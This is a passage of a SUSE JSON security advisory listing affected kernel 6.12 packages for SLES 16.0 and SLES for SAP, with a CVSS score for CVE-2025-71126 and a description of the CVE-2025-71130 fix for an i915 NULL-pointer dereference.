"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71126"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
